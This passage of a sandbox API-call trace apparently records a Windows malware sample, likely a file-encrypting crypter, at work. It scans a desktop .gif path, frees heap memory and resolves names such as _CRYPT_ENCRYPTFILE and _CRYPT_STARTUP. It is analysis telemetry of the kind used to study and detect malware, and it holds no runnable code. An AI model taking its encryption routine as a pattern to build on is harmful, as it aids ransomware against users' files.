dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dBnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BnuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nuAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uAEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AEyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EyPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yPilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ilbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lbFpD.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0076.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0076.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0076.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.890] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.891] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.891] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.891] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.891] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.892] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.892] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.892] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da68 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d7a8 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0076.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.894] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0076.894] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x186c4af0, ftCreationTime.dwHighDateTime=0x1d5dd9a, ftLastAccessTime.dwLowDateTime=0x2cc965b0, ftLastAccessTime.dwHighDateTime=0x1d5e794, ftLastWriteTime.dwLowDateTime=0x2cc965b0, ftLastWriteTime.dwHighDateTime=0x1d5e794, nFileSizeHigh=0x0, nFileSizeLow=0xfb13, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="8dBnuAEyPilbFpD.gif", cAlternateFileName="8DBNUA~1.GIF")) returned 0x6b8b38 [0076.894] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0076.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0076.895] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.895] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0076.895] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.895] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.895] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.895] 